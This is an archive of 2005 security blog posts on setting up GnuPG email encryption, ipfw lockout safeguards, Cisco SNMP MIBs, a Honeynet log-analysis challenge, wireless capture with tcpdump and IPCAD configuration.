Enter number(s), N)ext, or Q)uit > 1
gpg: requesting key 7932C9E3 from hkp server pgp.mit.edu
gpg: key 7932C9E3: public key "Robert Grabowsky " imported
gpg: Total number processed: 1
gpg: imported: 1

That was easy. Because I found the key and selected it, GnuPG imported it automatically. I can verify that.

orr:/home/richard$ gpg --list-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub 1024D/752B57C7 2005-04-23
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

pub 1024D/7932C9E3 2001-05-27
uid Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
uid Bob Grabowsky bob_at_infotech-nj_dot_com
uid Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
uid Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com
sub 1024g/8F0D6977 2001-05-27

Another alternative is to check a Web-based keyserver search form. I visited www.pgp.net/pgpnet/wwwkeys.html and searched on Bob's last name. Here are the pertinent results, with email addresses altered slightly to spoil harvesters.

pub 1024D/7932C9E3 2001-05-27 Bob Grabowsky bob_at_infotech-nj_dot_com
Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com

Notice the key ID of 7932C9E3. This is the same value that appeared in Bob's signature in the message he sent to me. This must be the right public key. I've already imported the key with GnuPG, but if I wanted to use the key stored on this Web-based keyserver, I would download the key linked to these results. I would then use the import command.

So how did I respond to Bob's email? Enigmail made it easy. I decided to reply, and Enigmail asked if I wanted to configure Enigmail to import Bob's public key. In a second window I confirmed that I wanted Enigmail to use Bob's email address to locate his public key. When I selected 'send', I briefly saw my message in ASCII-armored format like this.

-----BEGIN PGP MESSAGE-----
Charset: ISO-8859-1
Version: GnuPG v1.4.0 (FreeBSD)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

hQEOAzf/9vKPDWl3EAQAqmMHJKxFtj1oN2NV0wUGvNmYTXvazSSiWg3iPzNix+n0
i5qajeTQ+v6PSlY5SvMwDaW6Ojp6MtsQ90O5IrrE1TBfSeDpO6EbQ2Vd0xhdGNtT
...truncated...

Then it was on its way, and it appeared in clear text in my Thunderbird window. Because I also asked Engimail to sign the message for me, I saw a signature and key icons in the Thunderbird window indicating gpg had signed and encrypted my reply.

Earlier I mentioned importing a key from a file. As an example I import Bamm Visscher's public key, retrieved from the Web-accessible keyserver.

orr:/home/richard$ gpg --import bamm.asc
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: key 593C82C4: public key "Bamm Visscher (Senior
Engineer/Managed Security Services) rvisscher_at_saball_dot_com" imported
gpg: Total number processed: 1
gpg: imported: 1

Let's say I wanted to send an encrypted file to Bamm. The file is secret.txt. Here's how I would encrypt it. First I verify his user ID.

orr:/home/richard$ gpg --list-keys Bamm Visscher
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
pub 1024D/593C82C4 2001-06-26
uid Bamm Visscher (Senior Engineer/Managed Security Services)
rvisscher_at_saball_dot_com
sub 1024g/A3D3321B 2001-06-26

His UID is "Bamm Visscher". Now I encrypt secret.txt.

orr:/home/richard$ gpg -sear "Bamm Visscher" secret.txt
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

gpg: A3D3321B: There is no assurance this key belongs to the named user

pub 1024g/A3D3321B 2001-06-26 Bamm Visscher
(Senior Engineer/Managed Security Services) rvisscher_at_saball_dot_com
Primary key fingerprint: 7FA4 8692 4707 D567 E0D7 5835 416C 0915 593C 82C4
Subkey fingerprint: 4282 C306 F28B C630 8057 50EC E3E1 FEE5 A3D3 321B

It is NOT certain that the key belongs to the person named
in the user ID. If you *really* know what you are doing,
you may answer the next question with yes.

Use this key anyway? (y/N) y

The 's' switch signs the file. The 'e' switch specifies encryption. The 'a' switch tells gpg to create an ASCII-armored file suitable for transport via email text. The 'r' switch says a UID follows, e.g. "Bamm Visscher".

You'll notice gpg complained that it couldn't be sure Bamm's public key belonged to him. This is where the key fingerprint and a call to Bamm come into play. If I wanted to verify the authenticity of Bamm's public key, I would call him and ask him to tell me his fingerprint. Since it matches the value posted above, I know he is the owner of this public key. When I trust his key, then I can sign it with my own as follows.

orr:/home/richard$ gpg --sign-key A3D3321B
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

pub 1024D/593C82C4 created: 2001-06-26 expires: never usage: CSA
trust: unknown validity: unknown
sub 1024g/A3D3321B created: 2001-06-26 expires: never usage: E
[ unknown] (1). Bamm Visscher (Senior Engineer/Managed Security Services)


pub 1024D/593C82C4 created: 2001-06-26 expires: never usage: CSA
trust: unknown validity: unknown
Primary key fingerprint: 7FA4 8692 4707 D567 E0D7 5835 416C 0915 593C 82C4

Bamm Visscher (Senior Engineer/Managed Security Services)
rvisscher_at_saball_dot_com

Are you sure that you want to sign this key with your
key "Richard Bejtlich richard_at_taosecurity_dot_com" (752B57C7)

Really sign? (y/N) y

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

Let's say I now want to send Bamm secret2.txt in encrypted form. Does gpg complain after I've signed Bamm's public key?

orr:/home/richard$ gpg -sear "Bamm Visscher" secret2.txt
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

gpg: checking the trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0 valid: 1 signed: 1 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1 valid: 1 signed: 0 trust: 1-, 0q, 0n, 0m, 0f, 0u

No problems. If I wanted to upload this signed key to a keyserver, I could use this syntax.

gpg --keyserver [keyserver] --send-key [Key_ID]

I wrote these three blog entries to document how I got GnuPG running and working with Thunderbird. There are many GnuPG tutorials and documents online, and I recommend referencing them for more information. Thanks to Bob for sending a test message.

Decrypting Encrypted Email

No sooner had I posted my last entry on creating a GnuPG key, a visitor sent me an encrypted email. My mail client is Thunderbird, and it promptly put a message from Robert Grabowsky into my Junk folder. Thunderbird suspected the message was spam! It looked like this. Certain fields have been edited to foil email address harvesting:

Date: Sat, 23 Apr 2005 17:26:37 -0400 (EDT)
From: Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
To: Richard Bejtlich richard_at_taosecurit_dot_com
Subject: test of your key

-----BEGIN PGP MESSAGE-----

hQIOA+vNZOSLpEmREAf/XTL0KqQAnwOIkONZGgZMsyEFD00O7O8qzNRmv7A/IVwg
o95VmxSoUXDIwNtQG1QpSbTY217k/HmUEKup0n2laON49SGKj1H76SwS0BVNG8Xj
...edited...
ADc/eiJOmnZuhDhTYMJoqziAilKf9Y7ChHKKjtil2WTrnNL3qfwX5636Sb3sjFMg
f1Q+WCHWMr9LOQG3JGmGfjNZe6iMzp+Wl5y7m/j+7HMwiVp+J2sHyx1pffnGtFgP
=Xa7M
-----END PGP MESSAGE-----

To manually decrypt this message, I saved the message body into a file called msg.txt. Then I used gpg to decrypt it.

orr:/home/richard$ gpg -d msg.txt
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
2048-bit ELG-E key, ID 8BA44991, created 2005-04-23 (main key ID 752B57C7)

gpg: encrypted with 2048-bit ELG-E key, ID 8BA44991, created 2005-04-23
"Richard Bejtlich richard_at_taosecurity_dot_com"
Hi Richard,

Here's a quick test of your GnuPG key. Keep of the great work on the
blog, I check it every day!!!

Best Regards,
Bob

Robert Grabowsky, CISSP | Ra Security Systems, Inc.
rgrabowsky_at_rasecurity_dot_com | GPG KeyID 0x7932C9E3 (pgp.mit.edu)

An excellent alternative to manual decryption is Enigmail, a plug-in for Thunderbird and the Mozilla client. I installed the mail/enigmail-thunderbird FreeBSD package and then fired up Thunderbird. I had a new menu item called "Enigmail". When I highlighted Bob's message, Enigmail began a simple setup procedure.

It asked me to enter my private GnuPG passphrase, then it wanted to know where the gpg binary resided. I entered /usr/local/bin/gpg. With that, the message was decrypted automatically. Now when I see the message within Thunderbird, it appears as clear text.

Now I needed to send a reply. I will enter that in a future blog posting shortly.

Simple GnuPG Key Creation

I was recently asked to provide my GnuPG public key to facilitate sharing encrypted documents. I realized I needed to set up a public key with my richard at taosecurity dot com mailing address. Here's how I did it. First I installed the FreeBSD security/gnupg-devel package. Then I was ready to begin. I started by creating my key. Where necessary I've modified my email address in the listing below to spoil simple harvesting methods.

orr:/home/richard$ gpg --gen-key
gpg (GnuPG) 1.4.0; Copyright (C) 2004 Free Software Foundation, Inc.
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See the file COPYING for details.

gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: directory `/home/richard/.gnupg' created
gpg: new configuration file `/home/richard/.gnupg/gpg.conf' created
gpg: WARNING: options in `/home/richard/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/home/richard/.gnupg/secring.gpg' created
gpg: keyring `/home/richard/.gnupg/pubring.gpg' created
Please select what kind of key you want:
(1) DSA and Elgamal (default)
(2) DSA (sign only)
(5) RSA (sign only)
Your selection? 1
DSA keypair will have 1024 bits.
ELG-E keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048)
Requested keysize is 2048 bits
Please specify how long the key should be valid.
0 = key does not expire
= key expires in n days
w = key expires in n weeks
m = key expires in n months
y = key expires in n years
Key is valid for? (0) 0
Key does not expire at all
Is this correct? (y/N) y

You need a user ID to identify your key; the software constructs the user ID
from the Real Name, Comment and Email Address in this form:
"Heinrich Heine (Der Dichter) heinrichh@duesseldorf.de"

Real name: Richard Bejtlich
Email address: richard_at_taosecurity_dot_com
Comment:
You selected this USER-ID:
"Richard Bejtlich richard_at_taosecurity_dot_com"

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o
You need a Passphrase to protect your secret key.

Enter passphrase:

Repeat passphrase:

We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
++++++++++.
gpg: /home/richard/.gnupg/trustdb.gpg: trustdb created
gpg: key 752B57C7 marked as ultimately trusted
public and secret key created and signed.

gpg: checking the trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0 valid: 1 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 1u
pub 1024D/752B57C7 2005-04-23
Key fingerprint = 2B43 9A2E 6925 D581 5E34 FD6B 020C E655 752B 57C7
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

That's it. I then listed my keys.

orr:/home/richard$ gpg --list-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub 1024D/752B57C7 2005-04-23
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

orr:/home/richard$ gpg --list-secret-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/secring.gpg
--------------------------------
sec 1024D/752B57C7 2005-04-23
uid Richard Bejtlich richard_at_taosecurity_dot_com
ssb 2048g/8BA44991 2005-04-23

Here's how to see the key fingerprint. The fingerprint is a way to describe my key in shorthand form.

orr:/home/richard$ gpg --fingerprint
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub 1024D/752B57C7 2005-04-23
Key fingerprint = 2B43 9A2E 6925 D581 5E34 FD6B 020C E655 752B 57C7
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

To make my public key available in ASCII form, I exported it to a file.
orr:/home/richard$ gpg --export --armor richard_at_taosecurity_dot_com
> richard_at_taosecurity_dot_com.key.gpg.asc
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You can access my public key here.

Now I wanted to create a revocation key, to assist me in removing my public key from a keyserver should my private key ever be compromised.

orr:/home/richard$ gpg --gen-revoke richard_at_taosecurity_dot_com >
richard_at_taosecurity_dot_com.com.revoke.gpg.asc
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

sec 1024D/752B57C7 2005-04-23 Richard Bejtlich richard_at_taosecurity_dot_com

Create a revocation certificate for this key? (y/N) y
Please select the reason for the revocation:
0 = No reason specified
1 = Key has been compromised
2 = Key is superseded
3 = Key is no longer used
Q = Cancel
(Probably you want to select 1 here)
Your decision? 0
Enter an optional description; end it with an empty line:
Revoke

Reason for revocation: No reason specified
Revoke
Is this okay? (y/N) y

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

Enter passphrase:

ASCII armored output forced.
Revocation certificate created.

Please move it to a medium which you can hide away; if Mallory gets
access to this certificate he can use it to make your key unusable.
It is smart to print this certificate and store it away, just in case
your media become unreadable. But have some caution: The print system of
your machine might store the data and make it available to others!
orr:/home/richard$ chmod 400 richard_at_taosecurity_dot_com.revoke.gpg.asc

Finally, I wanted to make this new public key available on public keyservers. I have to specify my public key ID 752B57C7, which is seen in the --list-keys output above and is also the last eight characters of my key fingerprint.

orr:/home/richard$ gpg --send-keys 752B57C7
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: sending key 752B57C7 to hkp server subkeys.pgp.net

I also submitted my public key to www.keyserver.net, which has a Web-accessible search form. By default GnuPG sent my key to subkeys.pgp.net, Web page. To search the pgp.net keyservers, visit www.pgp.net/pgpnet/wwwkeys.html.

If someone cares to send me a message encrypted with my public key, a future blog entry will show how to decrypt it.

Thursday, April 21, 2005

ZDNet BSD Certification Coverage and More

Joe Brockmeier published an interview with Dru Lavigne, chair of the BSD Certification Group. I'm a member of that organization and I will be present at the BSDCan 2005 BoFs to discuss BSD certification with any interested parties. Dru's interview provides additional background on our progress towards creating respected, valuable BSD certifications.

Most importantly, today our Task Analysis Survey is publicly available. This is a Web-based questionnaire that we hope BSD users like you will complete. Our goal is to learn what BSD users and administrators consider to be the essential administration tasks for BSD systems. Please help us out by completing the survey no later than midnight GMT 22 May 2005. Thank you!

Wednesday, April 20, 2005

Todd Lammle Teaches CCNA in Denver in June

You may have followed my recent journey towards passing the CCNA exam. My instructor Todd Lammle just told me he will be teaching another CCNA class in Denver, from 13 to 17 June. This is a rare event as Todd runs the training company GlobalNet Training and stays very busy.

Todd is the author of the best-selling CCNA: Cisco Certified Network Associate, Deluxe Edition (640-801), 4th Ed which helped immensely. I highly recommend attending this class if you want to pass your CCNA. If you decide to go, please email me at taosecurity at gmail dot com. I would like to hear what you think of the class.

Cross-platform Pf Guide

Cross-platform Pf GuideWhile the official OpenBSD Pf guide is very good, I recommend those wishing to learn more about the Pf firewall check out Peter N. M. Hansteen's Firewalling with Pf guide. I like this document because it shows how to get Pf working on OpenBSD, FreeBSD, and NetBSD. Peter also covers the most common deployment scenarios and he addresses topics I consider important. Check it out if you're considering a Pf-based firewall solution.

FreeBSD News

I have some good FreeBSD news to report. FreeBSD 5.4-RC3 was announced Monday. Although the schedule still calls for a 26 April release date, I believe we will not see the RELEASE until the first week in May. According to the announcement:

"Due to one major issue that crops up on large (4-processor) systems under heavy load that is still being debugged there will be at least one more RC added to the schedule. Timing for the extra RC and the new Release date have not been set yet."

I am hoping that FreeBSD 5.4 will be the release that convinces 4.x users to upgrade. I have not had any problems running FreeBSD 5.3 since it arrived last November, but others are more cautious.

There's an interesting freebsd-stable thread with several hints on updating systems. This post by Aristedes Maniatis recommends using the following command to preserve access to a system when you accidentally lock yourself out while modifying firewall rules.

echo "ipfw add 1 pass all from any to any" at now +10 minutes

He continues with "Then if all goes OK, use atq to remove the queue item. If not, wait 10 minutes..."

That is great advice. I have heard of "people" locking themselves out of systems while modifying firewall rules.

David Talkington offered an alternative method to avoid lockout -- using IPFW's set 31 feature. From the manual:

set set_number
Each rule is associated with a set_number in the range 0..31.
Sets can be individually disabled and enabled, so this parameter
is of fundamental importance for atomic ruleset manipulation. It
can be also used to simplify deletion of groups of rules.
If a rule is entered without specifying a set number, set 0
will be used.
Set 31 is special in that it cannot be disabled, and rules in set
31 are not deleted by the ipfw flush command (but you can delete
them with the ipfw delete set 31 command). Set 31 is also used
for the default rule.

Here is how a normal IPFW rule (numbered 5000) is added, say to disable ICMP.

drury:/root# ipfw add 5000 deny icmp from any to any
05000 deny icmp from any to any
drury:/root# ipfw list
05000 deny icmp from any to any
65535 deny ip from any to any

If I flush the rules, only the default allow rule at bottom remains:

drury:/root# ipfw flush
Are you sure? [yn] y

Flushed all rules.
drury:/root# ipfw list
65535 deny ip from any to any

Now I add a set 31 rule. The syntax would be something like this:

drury:/root# ipfw add 10000 set 31 allow ip from 192.168.1.0/24 to any
10000 allow ip from 192.168.1.0/24 to any
drury:/root# ipfw list
10000 allow ip from 192.168.1.0/24 to any
65535 deny ip from any to any

This adds rule number 10000 with set 31. It allows any traffic from a defined subnet. Now I flush the rules and check the results.

drury:/root# ipfw flush
Are you sure? [yn] y

Flushed all rules.
drury:/root# ipfw list
10000 allow ip from 192.168.1.0/24 to any
65535 deny ip from any to any

I can rid myself of the set 31 rule using this method.

drury:/root# ipfw delete 10000 disable 31
drury:/root# ipfw list
65535 deny ip from any to any

On a different subject, Jean Simon mentioned the nextboot utility to specify an alternate kernel after performing an upgrade.

Tuesday, April 19, 2005

TaoSecurity Visits the Pentagon

This morning I was pleased to speak at the Pentagon on behalf of the Network Security Services-Pentagon section of the US Army Information Technology Agency. (I would like to provide a URL, but there's no point linking to sites that return "403.6 Forbidden: IP address rejected" errors!) Doug Steelman, pictured with me in the photo below, invited me to discuss network security monitoring at their Pentagon Security Forum. Last month Erik Birkholz and Steve Andres from Special Ops Security spoke on assessments. Next month Kevin Mandia of Red Cliff Consulting will discuss incident response. Doug and his colleague Mark Orlando were kind enough to take me on a tour of the building and share some of their approaches to detecting intrusions on the Pentagon's networks.

While I will not outline specifics here, I will say I was impressed by the variety of network traffic the Pentagon collects. They are not a single-solution shop that can be beaten by evading one variety of intrusion detection system deployed at the perimeter. Rather, they gather alert, session, and statistical data and have the capability to collect some full content data. I will not name tools, but I was surprised by some of their choices. By this I mean they seemed genuinely interested in novel approaches to identifying and validating security events.

As far as the Pentagon network is concerned, they are literally an ISP in their own right. They have multiple Autonomous Systems (AS') and they connect to the DISA backbone with 100 Mbps ATM links. After September 11th 2001 they decided to reengineer their network to be more disaster-resilient, and they are now deploying a MPLS-based routing design to facilitate this goal. I look forward to meeting and working with this team in the future, and I thank Doug and Mark for being great hosts today.

Monday, April 18, 2005

Researching Cisco Switch Backplane Statistics

While teaching at USENIX last week, I discussed SPAN ports. I mentioned that copying traffic to the SPAN port was less important than moving packets through the switch. One of the students asked if measuring the utilization of the switch backplane would reveal how well the switch was performing the SPAN function. Another student said there was a Simple Network Management Protocol Management Information Base (SNMP MIB) from which backplane statistics could be retrieved. I decided to research this issue as it affects using switches to collect traffic for network security monitoring. (Incidentally, Talisker offers SPAN port configuration advice for all sorts of switches.)

One answer appears in the Cisco document How to Get Catalyst Switch Backplane Utilization Using SNMP. This sounds promising until we read "the information in this document is valid for Cisco Catalyst switches that run Catalyst code only." Since modern Cisco switches run IOS, we seem out of luck.

That document produced several leads. First, it mentioned the CISCO-STACK-MIB. Finding this MIB clued me in to the multitude of MIBs offered by Cisco. They are available via FTP from ftp://ftp.cisco.com/pub/mibs/.

The link to the CISCO-STACK-MIB brought me to the SNMP Object Navigator. This is a really helpful tool. You can search object names and descriptions to receive a list of matching objects and MIBs for terms like backplane.

Another excellent resource is the MIBs Supported by Product tool. For example, here are all of the MIBs supported by the Cisco 2950 switch.

Cisco offers a few other helpful sites. These include the Cisco IOS MIB Tools page. That site has a link labelled MIB Locator. Follow it, select your IOS release, platform family (device), and IOS feature set, and you will learn what MIBs are present. Also useful are SNMP: Frequently Asked Questions About MIBs and the IP Application Services page for SNMP.

Getting back to the original question -- the original Cat OS discussion of the CISCO-STACK-MIB mentioned the sysTraffic Object Name as a place to find backplane information. Specifically, the description reads "Traffic meter value, i.e. the percentage of bandwidth utilization for the previous polling interval." The question now is to find out what Cisco devices support providing this information via SNMP. The View Supporting Images link on the sysTraffic page shows the Cisco IOS images which offer this SNMP value.

According to the results, the Cisco 3550 appears to be the cheapest switch which provides backplane statistics. I guess I won't be able to test this on my 2950! If anyone else managed to try this out, perhaps using snmpwalk from Net-SNMP, please post a comment.

New Honeynet Project Challenge

I saw that the Honeynet Project announced a new Scan of the Month last week. The evidence consists of Apache logs, Linux syslogs, Snort logs, and IPTables firewall logs. Here are examples.

From the Apache access log:

210.116.59.164 - - [13/Mar/2005:04:05:47 -0500]
"POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 1063 "-" "-"


From the /var/log/messages syslog:

Mar 13 22:50:53 combo sshd(pam_unix)[9356]:
authentication failure; logname= uid=0 euid=0
tty=NODEVssh ruser= rhost=h-67-103-15-70.nycmny83.covad.net user=root


From the Snort logs, apparently captured via syslog:

Feb 25 12:21:33 bastion snort: [1:483:5] ICMP PING CyberKit 2.2 Windows
[Classification: Misc activity] [Priority: 3]: {ICMP}
70.81.243.88 -> 11.11.79.100


Finally, from the IPTables logs:

Feb 25 12:11:24 bridge kernel: INBOUND TCP: IN=br0
PHYSIN=eth0 OUT=br0 PHYSOUT=eth1
SRC=220.228.136.38 DST=11.11.79.83 LEN=64 TOS=0x00
PREC=0x00 TTL=47 ID=17159 DF
PROTO=TCP SPT=1629 DPT=139 WINDOW=44620 RES=0x00 SYN URGP=0


Let's see how much data is in each of the logs. I used 'wc' to count lines in each of the sets of logs.

  • Apache: 7,620

  • Syslog: 3,925

  • Snort: 69,039

  • IPTables: 179,752

  • Total: 260,336


So, we have over 260,000 lines of log entries to review. This seems fairly crazy to me. As a NSM practitioner who advocates collecting session and full content data, I am often criticized by those who consider it too difficult or expensive to collect such forms of network evidence. This Scan of the Month presents the alternative -- working though line after line of text-based log entries. Now what is more expensive, in terms of time and resources?

You might say I would have the same problem analyzing this intrusion using NSM techniques. You might believe Snort would yield the same number of alerts whether configured to emit text-based records via syslog or alerts for presentation by Sguil.

I guarantee I could determine if the system was compromised, and by how many parties, faster using NSM techniques than manual log analysis.

I would also know exactly what network traffic the intruder launched against the target, regardless of whether or not it triggered a Snort alert. I would not have to look at text-based IPTables representations of packet movement. I could instead look at session data, which summarizes the thousands of packets in a flow into a single record.

I believe the winner of this SotM will end up being a Perl or Awk wizard who can parse the logs efficiently to reduce the number of lines to be analyzed.

This is still a useful challenge. If there is any data available at all after a compromise, it is often in the form of Web logs, syslogs, and so on. It is important to know how to interpret such evidence, if that is all there is to analyze. Still -- imagine the possibilities when NSM-based evidence is collected!

Friday, April 15, 2005

Speaking at Net Optics Think Tank Event in May

I will be presenting my thoughts on pervasive network awareness as facilitated by taps at the next Net Optics Think Tank. The event will take place on 18 May 2005 in their Sunnyvale, CA headquarters. I use Net Optics taps to gain access to traffic when performing network security monitoring.

Thursday, April 14, 2005

Red Cliff Article on Web Browser Forensics

I just learned of a new article, Web Browser Forensics, Part 1 by Keith J. Jones and Rohyt Belani of Red Cliff Consulting. This is part one of two articles, and it features a variety of methods to learn about a user's Web browsing history. Any time digital forensics appears in the news, it is often based on discovering a person's Web browsing activites. The Chandra Levy case is the canonical example.

Wireless Traffic Snippets

In my USENIX talk I show how to collect wireless traffic using Tcpdump. In my slides I use a verbose method that only shows a few packets. In the following I'd like to show a variety of traffic available using Tcpdump.

First I tell my wireless card to go into monitor mode and watch channel 1. Then I ask Tcpdump to show me the media types it understands.

orr:/root# ifconfig wi0 mediaopt monitor channel 1 up
orr:/root# tcpdump -i wi0 -L
Data link types (use option -y to set):
EN10MB (Ethernet)
IEEE802_11 (802.11)
IEEE802_11_RADIO (802.11 plus BSD radio information header)

Now that I see the media types, I select the second option and begin capturing traffic.

orr:/root# tcpdump -n -i wi0 -y IEEE802_11
tcpdump: data link type IEEE802_11
tcpdump: WARNING: wi0: no IPv4 address assigned
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wi0, link-type IEEE802_11 (802.11), capture size 96 bytes

First we see a beacon with the conference wireless access point SSID. Next is one of many clear-to-send packets.

00:21:19.586724 Beacon (usenix) [1.0* 2.0 5.5 6.0 9.0 11.0 12.0 18.0 Mbit] ESS CH: 1
00:21:19.587160 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

Here's more CTSs and a NetBIOS port 137 UDP query.

00:21:19.915245 Clear-To-Send RA:00:0d:54:9c:5c:0b
00:21:19.926293 IP 131.106.56.95.137 > 172.30.0.255.137: NBT UDP PACKET(137):
QUERY; REQUEST; BROADCAST
00:21:19.938333 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

We see our first 802.11 acknowledgement.

00:21:20.273184 Clear-To-Send RA:00:0f:34:42:b7:20
00:21:20.277588 Acknowledgment RA:00:90:4b:ae:8e:43
00:21:20.279822 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

Here's our first request to send.

00:21:20.710353 Clear-To-Send RA:00:0d:54:9c:5c:0b
00:21:20.711677 Request-To-Send TA:00:0d:54:9c:5c:0b
00:21:20.712081 Clear-To-Send RA:00:0d:54:9c:5c:0b
...truncated...

I don't know what the LLC packet means, but it's quickly followed by a probe request and response.

00:21:20.858267 Clear-To-Send RA:00:0f:34:42:b7:20
00:21:20.859258 [|llc](LLC 000d)
00:21:20.859604 Acknowledgment RA:00:0d:54:9c:5c:0b
00:21:20.860719 Probe Request () [1.0 2.0 5.5 11.0 Mbit]
00:21:20.862199 Probe Response (usenix) [1.0* 2.0 5.5 6.0 9.0 11.0 12.0 18.0 Mbit] CH: 1
00:21:20.862469 Acknowledgment RA:00:0f:34:42:b7:20
00:21:20.863118 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

We don't only see broadcast traffic. Here's a couple TCP packets:

00:21:26.612946 Clear-To-Send RA:00:0d:93:ec:5f:ba
00:21:26.619326 IP 216.239.57.105.80 > 131.106.58.64.1614:
F 126736513:126736513(0) ack 2074693501 win 8190
00:21:26.620840 IP 216.239.57.105.80 > 131.106.58.64.1614:
F 0:0(0) ack 1 win 8190
...truncated...

Here's an ARP request.

00:21:30.564116 Clear-To-Send RA:00:0f:34:42:b7:20
00:21:30.566783 arp who-has 131.106.56.11 tell 131.106.56.32
00:21:30.567184 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

Last, here's a DHCP request.

00:21:32.238510 Clear-To-Send RA:00:90:96:a6:6a:70
00:21:32.252827 IP 131.106.56.64.68 > 255.255.255.255.67:
BOOTP/DHCP, Request from 00:90:96:ab:c6:10, length: 300
00:21:32.254038 Acknowledgment RA:00:90:4b:ae:8e:43
00:21:32.275796 Clear-To-Send RA:00:0f:34:42:b7:20

That was the IEEE802_11 media option. Unfortunately, the IEEE802_11_RADIO option does not seem to produce anything useful.

orr:/root# tcpdump -n -i wi0 -y IEEE802_11_RADIO
tcpdump: data link type IEEE802_11_RADIO
tcpdump: WARNING: wi0: no IPv4 address assigned
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wi0, link-type IEEE802_11_RADIO
(802.11 plus BSD radio information header), capture size 96 bytes
00:26:12.788071 [|802.11]
00:26:12.788915 [|802.11]
00:26:12.789331 [|802.11]
...truncated...

This is nothing special, but it does show what you can capture using Tcpdump while not being associated with a wireless network.

Wednesday, April 13, 2005

Notes on IPCAD

Tomorrow morning I teach Network Security Monitoring with Open Source Tools at USENIX 05. I've been taking another look at the tools I will be presenting tomorrow to ensure I'm up-to-date on their latest versions and features.

One of the tools I talk about is IPCAD, the
IP Cisco Accounting Daemon by Lev Walkin. I discuss IPCAD in the section on statistical data for network security monitoring (NSM) in my book and my talk. I like IPCAD because it presents data just like one sees with the Cisco show ip accounting command. I actually used IPCAD in an incident response scenario several years ago, before I learned of Carter Bullard's Argus.

The version available in the FreeBSD ports tree (net-mgmt/ipcad) requires more entries in the ipcad.conf file than what I present in my book and slides. Here is the ipcad.conf file I created after I installed IPCAD using the FreeBSD port.

capture-ports disable;
interface wi0;
rsh enable at 127.0.0.1;
rsh root@127.0.0.1 admin;
dumpfile = ipcad.dump;
chroot = /var/ipcad;
memory_limit = 1m;

Before starting IPCAD, I created the directory /var/ipcad to hold the ipcad.dump file. Here's how I started IPCAD.

orr:/root# ipcad -drs
Opening wi0... [LCap] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
Can't open dump file ipcad.dump
Daemonized.

The -drs meant "daemonize," "import saved accounting table on startup," and "save the active accounting table on exit," respectively. Starting IPCAD opened a rsh server on my loopback address.

orr:/home/richard$ sockstat -4
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
root ipcad 736 3 tcp4 127.0.0.1:514 *:*
root dhclient 551 5 udp4 *:68 *:*
root sendmail 397 4 tcp4 127.0.0.1:25 *:*
root sshd 391 4 tcp4 *:22 *:*

